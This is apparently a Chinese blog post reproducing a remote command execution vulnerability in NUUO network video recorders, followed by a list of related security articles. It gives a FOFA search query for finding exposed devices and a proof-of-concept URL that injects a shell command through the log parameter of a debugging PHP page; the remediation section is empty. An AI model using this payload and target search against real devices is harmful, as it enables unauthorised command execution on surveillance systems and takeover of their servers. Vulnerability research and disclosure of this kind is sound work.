【漏洞复现】NUUO摄像头存在远程命令执行漏洞

漏洞描述

NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

复制代码
fofa title="Network Video Recorder Login "

漏洞复现

漏洞链接:http://127.0.0.1/**debugging_center_utils** _.php?log=;id

修复方案

相关推荐
hjh198291 分钟前
渗透前四天总结
网络·网络安全
ZLJ0507241 小时前
网络安全的基本练习
安全·网络安全
桑晒.2 小时前
Webshell连接工具原理
安全·web安全·网络安全
mooyuan天天6 小时前
DVWA靶场通关笔记-弱会话IDs(Weak Session IDs High级别)
web安全·dvwa靶场·弱会话id
Bulestar_xx14 小时前
20250711_Sudo 靶机复盘
linux·安全·web安全
小红卒16 小时前
sqli-labs靶场通关笔记:第1-4关 联合注入
网络安全·sql注入漏洞
捉鸭子19 小时前
转转APP逆向
爬虫·python·网络安全·网络爬虫
半梦半醒*1 天前
OSPF实验一
运维·网络·网络协议·tcp/ip·网络安全·信息与通信
上海云盾商务经理杨杨1 天前
标题:2025游戏反外挂终极指南:从DMA对抗到生态治理的全面防御体系
游戏·网络安全
痴人说梦梦中人1 天前
Gin框架统一响应与中间件机制学习笔记
网络安全·中间件·go·gin